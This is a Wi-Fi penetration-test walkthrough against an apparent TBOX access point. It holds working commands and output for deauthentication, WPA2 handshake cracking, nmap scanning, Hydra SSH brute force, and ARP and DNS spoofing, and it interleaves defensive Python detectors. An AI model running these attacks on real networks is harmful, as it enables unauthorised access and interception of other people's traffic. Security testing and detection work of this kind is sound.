WIFI PENTEST

1. Sniffing
Scan the whole network and look for suspicious entries (this access point has SSID broadcast disabled):
Send deauthentication frames:
sudo aireplay-ng --deauth 10 -a 74:07:7E:ED:7B:8D wlan0 --ignore-negative-one
This reveals the ESSID and the MAC addresses of the connected clients:
ESSID: HQL00000000
Encryption: WPA2
Start capturing, writing the capture to a file named handshake:
sudo airodump-ng -c 6 --bssid 74:07:7E:ED:7B:8D -w handshake wlan0
Send deauthentication frames so that the client disconnects and performs a new handshake with the AP:
sudo aireplay-ng --deauth 10 -a 74:07:7E:ED:7B:8D wlan0 --ignore-negative-one
The handshake is captured and written to the file during this process.
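On the defender's side, the burst of deauthentication frames this step relies on is easy to spot in a monitor-mode capture. The Python below is an added example, not part of the original writeup: it runs a sliding-window count of deauthentication frames per BSSID over constructed frame records (the BSSID is the one from this page; the second AP, the timestamps and the thresholds are assumed) and raises one alert per BSSID whose count reaches the threshold.

```python
from collections import deque
from dataclasses import dataclass

@dataclass(frozen=True)
class MgmtFrame:
    ts: float      # capture timestamp in seconds
    subtype: str   # "deauth", "beacon", "probe_resp", ...
    bssid: str
    dst: str       # receiver address; ff:ff:ff:ff:ff:ff means broadcast

BROADCAST = "ff:ff:ff:ff:ff:ff"

def deauth_bursts(frames, window=5.0, threshold=20):
    """Sliding-window deauthentication counter per BSSID.

    Returns (bssid, first_ts, count, broadcast_count) for every BSSID whose
    deauth count inside some `window`-second span reaches `threshold`.
    Legitimate deauths are rare and normally unicast; a dense burst that is
    mostly broadcast is the classic signature of a forced re-handshake.
    """
    recent = {}                     # bssid -> deque of (ts, is_broadcast)
    alerted, alerts = set(), []
    for f in sorted(frames, key=lambda x: x.ts):
        if f.subtype != "deauth" or f.bssid in alerted:
            continue
        q = recent.setdefault(f.bssid, deque())
        q.append((f.ts, f.dst == BROADCAST))
        while f.ts - q[0][0] > window:  # drop frames older than the window
            q.popleft()
        if len(q) >= threshold:
            alerts.append((f.bssid, q[0][0], len(q), sum(b for _, b in q)))
            alerted.add(f.bssid)    # one alert per BSSID per capture
    return alerts

# Constructed capture: the AP from this page receiving a deauth burst, plus
# an assumed second AP that sees two ordinary unicast deauths.
AP_UNDER_TEST = "74:07:7E:ED:7B:8D"
OTHER_AP = "02:00:00:00:00:01"      # assumed
SAMPLE_FRAMES = (
    [MgmtFrame(100.0 + i * 0.1, "beacon", AP_UNDER_TEST, BROADCAST) for i in range(20)]
    + [MgmtFrame(100.5 + i * 0.02, "deauth", AP_UNDER_TEST, BROADCAST) for i in range(64)]
    + [MgmtFrame(101.0, "deauth", OTHER_AP, "02:00:00:00:00:02"),
       MgmtFrame(130.0, "deauth", OTHER_AP, "02:00:00:00:00:02")]
)

if __name__ == "__main__":
    for bssid, start, count, bcast in deauth_bursts(SAMPLE_FRAMES):
        print(f"ALERT {bssid}: {count} deauth frames from t={start:.2f}s, {bcast} broadcast")
```

With 802.11w (Protected Management Frames) enabled on the AP and clients, unprotected deauthentication frames are discarded, so a detector like this complements PMF rather than replacing it.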
2. Weak-password cracking
Using the captured handshake, run a dictionary attack with the wordlist shipped with Kali:
sudo aircrack-ng -w /usr/share/dict/wordlist-probable.txt -b 74:07:7E:ED:7B:8D -e HQL00000000 handshake-01.cap
3. Password complexity analysis
Using the zxcvbn library, with the password HomeWifi@2025 as the example, the output is:
Password strength score (0-4): 4
Crack-time estimates:
online_throttling_100_per_hour: centuries
online_no_throttling_10_per_second: centuries
offline_slow_hashing_1e4_per_second: 1 year
offline_fast_hashing_1e10_per_second: 37 seconds
Password feedback suggestions:
Warnings:
None
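The crack-time table above is zxcvbn's guess estimate divided by each attacker profile's guess rate and rendered in the largest fitting time unit. The Python below is an added example, not part of the original writeup and not zxcvbn's own code: it reproduces that rendering for the four zxcvbn profiles and adds an assumed WPA2 profile (1e6 guesses/s, roughly one high-end GPU against PBKDF2-HMAC-SHA1 with 4096 iterations) so the passphrase is judged against the hash it actually protects; the guess count is a constructed value chosen to match the figures shown for HomeWifi@2025.

```python
# Crack-time rendering in the style of zxcvbn's display_time(), plus a
# WPA2-specific attacker profile. Added example, not zxcvbn's own code.

MINUTE, HOUR, DAY = 60, 60 * 60, 24 * 60 * 60
MONTH, YEAR = 31 * DAY, 365 * DAY
CENTURY = 100 * YEAR

# Guesses per second per attacker model. The first four are zxcvbn's standard
# profiles; the last one is an assumption: WPA2-PSK derives the PMK with
# PBKDF2-HMAC-SHA1 (4096 iterations), which holds one high-end GPU to roughly
# 1e6 guesses/s, so the 1e10 "fast hashing" row overstates the risk for a
# Wi-Fi passphrase while the 1e4 "slow hashing" row understates it.
ATTACKER_PROFILES = {
    "online_throttling_100_per_hour": 100 / HOUR,
    "online_no_throttling_10_per_second": 10.0,
    "offline_slow_hashing_1e4_per_second": 1e4,
    "offline_fast_hashing_1e10_per_second": 1e10,
    "offline_wpa2_pbkdf2_1e6_per_second": 1e6,   # assumed rate, see above
}

def display_time(seconds: float) -> str:
    """Render a duration as zxcvbn does: largest fitting unit, rounded, pluralised."""
    if seconds < 1:
        return "less than a second"
    steps = ((MINUTE, 1, "second"), (HOUR, MINUTE, "minute"), (DAY, HOUR, "hour"),
             (MONTH, DAY, "day"), (YEAR, MONTH, "month"), (CENTURY, YEAR, "year"))
    for limit, divisor, unit in steps:
        if seconds < limit:
            base = round(seconds / divisor)
            return f"{base} {unit}" + ("" if base == 1 else "s")
    return "centuries"

def crack_times(guesses: float) -> dict:
    """Map every attacker profile to its rendered crack-time estimate."""
    return {name: display_time(guesses / rate) for name, rate in ATTACKER_PROFILES.items()}

def survives_wpa2_offline(guesses: float, years: float = 10.0) -> bool:
    """Policy check: the passphrase must outlast `years` of offline guessing at
    the assumed WPA2 rate before it is accepted for a PSK network."""
    return guesses / ATTACKER_PROFILES["offline_wpa2_pbkdf2_1e6_per_second"] >= years * YEAR

# Constructed guess count, consistent with the figures shown for HomeWifi@2025
# (3.7e11 guesses at 1e10/s is 37 seconds; at 1e4/s it rounds to 1 year).
EXAMPLE_GUESSES = 3.7e11

if __name__ == "__main__":
    for profile, estimate in crack_times(EXAMPLE_GUESSES).items():
        print(f"{profile}: {estimate}")
    print("accepted for WPA2-PSK:", survives_wpa2_offline(EXAMPLE_GUESSES))
```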
4. Internal network penetration
4.1 Scanning for online hosts
After cracking the Wi-Fi password and joining the network, identify the hosts that are online in this subnet:
sudo nmap -sn 192.168.10.0/24
# Output:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:37 CST
Nmap scan report for 192.168.10.1
Host is up (0.050s latency).
MAC Address: 8A:AC:1D:09:AA:CF (Unknown)
Nmap scan report for 192.168.10.147
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 12.24 seconds
Only two hosts are online at this point, one of which is this machine, so the AP's IP is 192.168.10.1.
4.2 Gathering information on the online device
Get information about this host:
sudo nmap -A 192.168.10.1
# Output:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:43 CST
Nmap scan report for bogon (192.168.10.1)
Host is up (0.37s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 9.4 (protocol 2.0)
| ssh-hostkey:
|   256 34:03:90:3a:42:00:9d:cb:fa:80:f8:96:85:e3:08:1d (ECDSA)
|_  256 ca:bf:15:8d:42:28:5d:10:8c:67:f2:89:c9:b8:65:62 (ED25519)
MAC Address: 8A:AC:1D:09:AA:CF (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|switch|storage-misc|media device|load balancer
Running (JUST GUESSING): Linux 3.X|4.X (97%), Netgear embedded (91%), QNAP embedded (91%), Zgemma embedded (89%), Kemp embedded (87%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:3.18.24 cpe:/o:linux:linux_kernel:4.14 cpe:/o:linux:linux_kernel:4.4 cpe:/o:linux:linux_kernel:4.9
Aggressive OS guesses: Linux 3.12 - 4.10 (97%), Linux 3.18 (93%), Linux 3.16 (91%), Linux 4.14 (91%), Netgear GS108Tv3, GS110Tv3, or GS308T switch (Linux 3.18.24) (91%), QNAP NAS device (Linux 4.14) (91%), Zgemma H9 TV receiver (Linux 4.4) (89%), Kemp LoadMaster Firmware 7.2 (Linux 4.9) (87%), Rebranded surveillance DVR (Hikvision, Q-SEE, EYEsurv, A1Webcams, Foscam) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT       ADDRESS
1   365.84 ms bogon (192.168.10.1)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.12 seconds
This shows that the TBOX's SSH service has not been disabled.
4.3 Capturing unencrypted traffic on the internal network
sudo tcpdump -i wlan0
Analyse the capture with Wireshark.
4.4 Vulnerability scanning
The online device here is the TBOX.
sudo nmap --script vuln 192.168.10.1
# Output:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-09 14:56 CST
Nmap scan report for 192.168.10.1
Host is up (0.38s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE
22/tcp open  ssh
MAC Address: 8A:AC:1D:09:AA:CF (Unknown)
Nmap done: 1 IP address (1 host up) scanned in 44.26 seconds
4.5 SSH brute force
$ ssh user@192.168.10.1
# Output:
The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.
ED25519 key fingerprint is SHA256:s9L3hh3ICgQoYvYvJWftPyYLdnH+dRTgALELHxrMkEM.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
$ ssh root@192.168.10.1
# Output:
root@192.168.10.1's password:
$ ssh guest@192.168.10.1
# Output:
guest@192.168.10.1's password:
The login prompts show that the users root and guest exist and use passwords, while the user account uses an asymmetric key:
For root and guest:
$ hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.1
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-09 15:27:56
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.10.1:22/
[STATUS] 100.00 tries/min, 100 tries in 00:01h, 14344301 to do in 2390:44h, 14 active
[STATUS] 109.67 tries/min, 329 tries in 00:03h, 14344072 to do in 2179:58h, 14 active
$ hydra -l guest -P /usr/share/wordlists/rockyou.txt ssh://192.168.10.1
Neither account could be cracked.
5. Man-in-the-middle attacks
5.1 ARP spoofing
ARP spoofing tells the target device and the gateway that the attacker is the legitimate other end of the conversation.
5.1.1 Using Bettercap
- Install Bettercap:
  sudo apt update
  sudo apt install bettercap
- Start Bettercap:
  sudo bettercap -iface wlan0
- Run ARP spoofing:
  net.probe on                        # discover devices on the LAN
  set arp.spoof.targets 192.168.10.1  # set the target device
  arp.spoof on                        # enable ARP spoofing
  net.sniff on                        # enable traffic sniffing
5.1.2 Using Ettercap
- Start Ettercap:
  sudo ettercap -G
- Select the network interface (e.g. wlan0).
- Scan and select targets:
  - Scan the target subnet (192.168.10.0/24) and add the target device and the gateway to the list of targets.
- Start ARP spoofing:
  Mitm > ARP Poisoning > Sniff Remote Connections
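From the defender's side, the ARP spoofing described in 5.1 shows up as the gateway's IP suddenly being answered by a second MAC address. The Python below is an added example, not part of the original writeup and not Bettercap or Ettercap code: it checks a stream of ARP replies against a pinned gateway mapping and flags any IP that is claimed by more than one MAC; the gateway IP and MAC are the ones reported by the nmap output on this page, while the other hosts and their MACs are constructed.

```python
from dataclasses import dataclass

@dataclass(frozen=True)
class ArpReply:
    ts: float
    sender_ip: str
    sender_mac: str

# Pinned gateway mapping, taken from the nmap output earlier on this page.
PINNED = {"192.168.10.1": "8A:AC:1D:09:AA:CF"}

def detect_arp_spoofing(replies, pinned=PINNED):
    """Return alerts for ARP replies that contradict a pinned mapping or an
    earlier observation. Each alert is (ts, ip, expected_mac, seen_mac, reason).

    Two checks are applied:
      1. "pinned":   a static IP->MAC table for critical hosts (the gateway);
      2. "conflict": any other IP that is claimed by a second MAC during the capture.
    The learned table is never overwritten by a conflicting reply, so a spoofer
    cannot re-train the detector simply by answering more often.
    """
    seen = dict(pinned)          # pinned entries plus IP->MAC pairs learned so far
    alerts = []
    for r in sorted(replies, key=lambda x: x.ts):
        mac = r.sender_mac.upper()
        expected = seen.get(r.sender_ip)
        if expected is None:
            seen[r.sender_ip] = mac
        elif expected != mac:
            reason = "pinned" if r.sender_ip in pinned else "conflict"
            alerts.append((r.ts, r.sender_ip, expected, mac, reason))
    return alerts

# Constructed capture: normal traffic, then one host starts answering for the
# gateway with its own MAC and also impersonates another client.
SAMPLE_REPLIES = [
    ArpReply(1.0, "192.168.10.1", "8a:ac:1d:09:aa:cf"),    # genuine gateway
    ArpReply(2.0, "192.168.10.50", "02:00:00:00:00:50"),   # assumed client
    ArpReply(3.0, "192.168.10.147", "02:00:00:00:01:47"),  # assumed client
    ArpReply(9.0, "192.168.10.1", "02:00:00:00:01:47"),    # gateway claimed by .147
    ArpReply(9.5, "192.168.10.50", "02:00:00:00:01:47"),   # .50 claimed by .147
]

if __name__ == "__main__":
    for ts, ip, expected, seen_mac, reason in detect_arp_spoofing(SAMPLE_REPLIES):
        print(f"t={ts}: {ip} answered by {seen_mac}, expected {expected} ({reason})")
```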
5.2 DNS spoofing
DNS spoofing redirects the target device's requests to an address chosen by the attacker.
5.2.1 Using Bettercap's DNS spoof module
- Configure DNS spoofing:
  set dns.spoof.domains example.com   # replace with the domain to intercept
  set dns.spoof.address 192.168.10.1  # replace with the spoofed IP address
  dns.spoof on
- Once active, the target's requests for example.com are redirected to the attacker's device.